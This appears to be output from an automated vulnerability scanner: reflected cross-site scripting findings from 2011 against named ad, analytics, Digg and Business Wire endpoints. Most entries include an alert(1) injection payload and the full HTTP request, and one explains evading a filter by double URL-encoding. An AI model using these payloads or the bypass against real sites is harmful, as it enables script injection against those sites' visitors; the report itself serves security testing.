The value of the hl request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bcc3a%3balert(1)//9a1d8570383 was submitted in the hl parameter. This input was echoed as bcc3a;alert(1)//9a1d8570383 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the kind request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1292f%3balert(1)//5587302e2 was submitted in the kind parameter. This input was echoed as 1292f;alert(1)//5587302e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the hl request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 12213%3balert(1)//ad3d5b34e0e was submitted in the hl parameter. This input was echoed as 12213;alert(1)//ad3d5b34e0e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the kind request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3441b%3balert(1)//459d8fa95bc was submitted in the kind parameter. This input was echoed as 3441b;alert(1)//459d8fa95bc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29d16"-alert(1)-"f9985bb395a was submitted in the anId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=14429d16"-alert(1)-"f9985bb395a&pubId=23374&campId=168344 HTTP/1.1 Host: pixel.adsafeprotected.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/tigerdirect.com/ROS_728x90;sz=728x90;ord=[timestamp]?
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=2C67127172975912387824C2C36500C2; Path=/ Content-Type: text/javascript Date: Tue, 27 Sep 2011 22:13:00 GMT Connection: close
The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5ef1"-alert(1)-"a3b5405208e was submitted in the campId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=23374&campId=168344f5ef1"-alert(1)-"a3b5405208e HTTP/1.1 Host: pixel.adsafeprotected.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/tigerdirect.com/ROS_728x90;sz=728x90;ord=[timestamp]?
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=9331CC42371478F2EF9CE249702D904B; Path=/ Content-Type: text/javascript Date: Tue, 27 Sep 2011 22:13:00 GMT Connection: close
1.290. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pixel.adsafeprotected.com
Path:
/jspix
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57867"-alert(1)-"c74cfdd5c3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=23374&campId=168344&57867"-alert(1)-"c74cfdd5c3d=1 HTTP/1.1 Host: pixel.adsafeprotected.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/tigerdirect.com/ROS_728x90;sz=728x90;ord=[timestamp]?
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=CE0F09E19FED188131E1C1FE386DA047; Path=/ Content-Type: text/javascript Date: Tue, 27 Sep 2011 22:13:21 GMT Connection: close
The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 309a8"-alert(1)-"633cafc44ab was submitted in the pubId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=23374309a8"-alert(1)-"633cafc44ab&campId=168344 HTTP/1.1 Host: pixel.adsafeprotected.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/tigerdirect.com/ROS_728x90;sz=728x90;ord=[timestamp]?
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=3BAB401A71B6DEBFC73DAFAC83A8175B; Path=/ Content-Type: text/javascript Date: Tue, 27 Sep 2011 22:13:00 GMT Connection: close
The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 51a7e<x%20style%3dx%3aexpression(alert(1))>f4490ed59f1 was submitted in the name parameter. This input was echoed as 51a7e<x style=x:expression(alert(1))>f4490ed59f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /serve/fb/pdc?cat=&name=landing51a7e<x%20style%3dx%3aexpression(alert(1))>f4490ed59f1&sid=3984&xr=2764965424800301950&referer=http%3A%2F%2Fwww.gigya.com%2Fsocial-login%2F HTTP/1.1 Host: pixel.fetchback.com Proxy-Connection: keep-alive Referer: http://pixel.fetchback.com/serve/fb/pdj?cat=&name=landing&sid=3984 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef826'%3balert(1)//45f0f864480 was submitted in the admeld_callback parameter. This input was echoed as ef826';alert(1)//45f0f864480 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.0 200 OK Server: IM BidManager Date: Thu, 11 Aug 2011 22:42:32 GMT P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Expires: Thu, 11-Aug-2011 22:42:12 GMT Content-Type: text/javascript Pragma: no-cache Cache-Control: no-cache Content-Length: 245
The value of the publisher_redirecturl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d48ae"><script>alert(1)</script>e618e93dd42 was submitted in the publisher_redirecturl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.0 200 OK Server: IM BidManager Date: Tue, 27 Sep 2011 22:12:18 GMT P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Expires: Tue, 27-Sep-2011 22:11:58 GMT Content-Type: text/html Pragma: no-cache Cache-Control: no-cache Content-Length: 264
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fd00"><script>alert(1)</script>514e088d3b5 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 205e7"><script>alert(1)</script>f924f81b73c was submitted in the sp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e956b<img%20src%3da%20onerror%3dalert(1)>6e552069ce was submitted in the REST URL parameter 1. This input was echoed as e956b<img src=a onerror=alert(1)>6e552069ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cd862<img%20src%3da%20onerror%3dalert(1)>acdc49c406c was submitted in the REST URL parameter 2. This input was echoed as cd862<img src=a onerror=alert(1)>acdc49c406c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4d4f7<img%20src%3da%20onerror%3dalert(1)>30f29d59763 was submitted in the REST URL parameter 3. This input was echoed as 4d4f7<img src=a onerror=alert(1)>30f29d59763 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d735d<img%20src%3da%20onerror%3dalert(1)>8340f1bf678 was submitted in the REST URL parameter 1. This input was echoed as d735d<img src=a onerror=alert(1)>8340f1bf678 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload afd35<img%20src%3da%20onerror%3dalert(1)>17454ca8835 was submitted in the REST URL parameter 2. This input was echoed as afd35<img src=a onerror=alert(1)>17454ca8835 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a7f0e<img%20src%3da%20onerror%3dalert(1)>21e74a267b was submitted in the REST URL parameter 3. This input was echoed as a7f0e<img src=a onerror=alert(1)>21e74a267b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload eacc2<script>alert(1)</script>69732fbac36 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the addressfull request parameter is copied into the HTML document as plain text between tags. The payload cc962<a>6264bc0d9da was submitted in the addressfull parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the app_handle request parameter is copied into the HTML document as plain text between tags. The payload 5c254<script>alert(1)</script>2623adaaaf0 was submitted in the app_handle parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rok-get?app_handle=cncnetworkbar5c254<script>alert(1)</script>2623adaaaf0&unit_sp=64&site=11&wrapper=json HTTP/1.1 Host: rok.com.com Proxy-Connection: keep-alive Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
rubicsResponse ( { rubics: { meta: { timestamp: "2011.08.31.14.49.06.PDT", v: "$Name: not supported by cvs2svn $", adstamp: "", errorText: "Empty ROS response text: _URI=http://rok.com.com/rok-get?app_handle=cncnetworkbar5c254<script>alert(1)</script>2623adaaaf0&unit_sp=64&site=11&wrapper=json;COULD NOT MAP APP_HANDLE=\"cncnetworkbar5c254scriptalert(1)script2623adaaaf0\" TO APP_ID" }, request: { appHandle: "cncnetworkbar5c254scriptalert(1)script2623ad ...[SNIP]...
1.306. http://rok.com.com/rok-get [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://rok.com.com
Path:
/rok-get
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ce085<script>alert(1)</script>a0bb84065da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rok-get?app_handle=cncnetworkbar&unit_sp=64&site=11&wrapper=json&ce085<script>alert(1)</script>a0bb84065da=1 HTTP/1.1 Host: rok.com.com Proxy-Connection: keep-alive Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the site request parameter is copied into the HTML document as plain text between tags. The payload 65ce0<script>alert(1)</script>da8a56256af was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rok-get?app_handle=cncnetworkbar&unit_sp=64&site=1165ce0<script>alert(1)</script>da8a56256af&wrapper=json HTTP/1.1 Host: rok.com.com Proxy-Connection: keep-alive Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the unit_sp request parameter is copied into the HTML document as plain text between tags. The payload a6810<script>alert(1)</script>4c046e454a2 was submitted in the unit_sp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rok-get?app_handle=cncnetworkbar&unit_sp=64a6810<script>alert(1)</script>4c046e454a2&site=11&wrapper=json HTTP/1.1 Host: rok.com.com Proxy-Connection: keep-alive Referer: http://www.techrepublic.com/blog/mac/evaluating-google-chrome-on-the-mac/667 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a8c1'%3balert(1)//3abc9ca82ca was submitted in the site parameter. This input was echoed as 9a8c1';alert(1)//3abc9ca82ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/counter.asp?site=s25awsblog9a8c1'%3balert(1)//3abc9ca82ca HTTP/1.1 Host: s25.sitemeter.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://aws.typepad.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 02 Oct 2011 01:25:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Content-Length: 7316 Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 01:35:59 GMT Cache-control: private
The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5378'%3balert(1)//93565cda0b5 was submitted in the site parameter. This input was echoed as c5378';alert(1)//93565cda0b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/counter.js?site=s25awsblogc5378'%3balert(1)//93565cda0b5 HTTP/1.1 Host: s25.sitemeter.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://aws.typepad.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Sun, 02 Oct 2011 01:26:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Content-Length: 7316 Content-Type: application/x-javascript Expires: Sun, 02 Oct 2011 01:36:00 GMT Cache-control: private
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a8c53<script>alert(1)</script>8191e201fe7 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /1.0/endpoint?method=story.getAll&link=http%3A%2F%2Fwww.iab.net%2Fpublic_policy%2Fcodeofconduct&type=javascript&callback=gig_pc_digg_1314893420413_13236868544481695a8c53<script>alert(1)</script>8191e201fe7 HTTP/1.1 Host: services.digg.com Proxy-Connection: keep-alive Referer: http://www.iab.net/public_policy/codeofconduct User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 7b022<script>alert(1)</script>b58af19e21a was submitted in the method parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /1.0/endpoint?method=story.getAll7b022<script>alert(1)</script>b58af19e21a&link=http%3A%2F%2Fwww.iab.net%2Fpublic_policy%2Fcodeofconduct&type=javascript&callback=gig_pc_digg_1314893420413_13236868544481695 HTTP/1.1 Host: services.digg.com Proxy-Connection: keep-alive Referer: http://www.iab.net/public_policy/codeofconduct User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
gig_pc_digg_1314893420413_13236868544481695({ "status": 403, "timestamp": 1314893560, "message": "No such method 'story.getAll7b022<script>alert(1)</script>b58af19e21a' on version 1.0", "code": 1052 });
1.313. http://services.digg.com/1.0/endpoint [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://services.digg.com
Path:
/1.0/endpoint
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7f5a2<script>alert(1)</script>1f52765a28f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /1.0/endpoint?method=story.getAll&link=http%3A%2F%2Fwww.iab.net%2Fpublic_policy%2Fcodeofconduct&type=javascript&callback=gig_pc_digg_1314893420413_13236868544481695&7f5a2<script>alert(1)</script>1f52765a28f=1 HTTP/1.1 Host: services.digg.com Proxy-Connection: keep-alive Referer: http://www.iab.net/public_policy/codeofconduct User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the type request parameter is copied into the HTML document as plain text between tags. The payload 43c47<script>alert(1)</script>e22ca6b0f41 was submitted in the type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /1.0/endpoint?method=story.getAll&link=http%3A%2F%2Fwww.iab.net%2Fpublic_policy%2Fcodeofconduct&type=javascript43c47<script>alert(1)</script>e22ca6b0f41&callback=gig_pc_digg_1314893420413_13236868544481695 HTTP/1.1 Host: services.digg.com Proxy-Connection: keep-alive Referer: http://www.iab.net/public_policy/codeofconduct User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dc95e%3balert(1)//877d56ad18e was submitted in the cb parameter. This input was echoed as dc95e;alert(1)//877d56ad18e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload e20d7<script>alert(1)</script>36250b8f91c was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /widgets/nearyou/search?api_key=45ts42zbd3tjfp25g722juwz&s=date_asc&f=activities&v=json&m=meta%3AstartDate%3Adaterange%3Atoday..&l=&num=3&cb=OX.AJAST.__callbacks__.callback1e20d7<script>alert(1)</script>36250b8f91c HTTP/1.1 Host: widgets.active.com Proxy-Connection: keep-alive Referer: http://www.activenetwork.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 4ea29<script>alert(1)</script>30dae4c7855 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /buttons/count?url=file%3A///D%3A/acunetix_reports/reports/mvtimescom/blind-sql-injection-xss-cwe79-capec66-poc.html4ea29<script>alert(1)</script>30dae4c7855 HTTP/1.1 Host: widgets.digg.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 10500%253cscript%253ealert%25281%2529%253c%252fscript%253ec09c9ece34b was submitted in the REST URL parameter 3. This input was echoed as 10500<script>alert(1)</script>c09c9ece34b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/home/2011060600639010500%253cscript%253ealert%25281%2529%253c%252fscript%253ec09c9ece34b/en/eBay-Agrees-Acquire-Magento HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.businesswire.com
Response
HTTP/1.1 200 OK Date: Fri, 12 Aug 2011 13:41:29 GMT Server: Apache Vary: Host Cache-Control: no-cache X-Powered-By: Servlet/2.5 JSP/2.1 Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 21474
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>News | Business ...[SNIP]... <span class="epi-error">Cannot find news for id = 2011060600639010500<script>alert(1)</script>c09c9ece34b and language = en.</span> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 11e6f%253cscript%253ealert%25281%2529%253c%252fscript%253e7f5cefa0606 was submitted in the REST URL parameter 4. This input was echoed as 11e6f<script>alert(1)</script>7f5cefa0606 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/home/20110606006390/en11e6f%253cscript%253ealert%25281%2529%253c%252fscript%253e7f5cefa0606/eBay-Agrees-Acquire-Magento HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.businesswire.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>News | Business ...[SNIP]... <span class="epi-error">Cannot find news for id = 20110606006390 and language = en11e6f<script>alert(1)</script>7f5cefa0606.</span> ...[SNIP]...
The value of the PC_7_1_CKB_input.hidden_rf request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 35e0e%3balert(1)//b81aa6338aede4970 was submitted in the PC_7_1_CKB_input.hidden_rf parameter. This input was echoed as 35e0e;alert(1)//b81aa6338aede4970 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
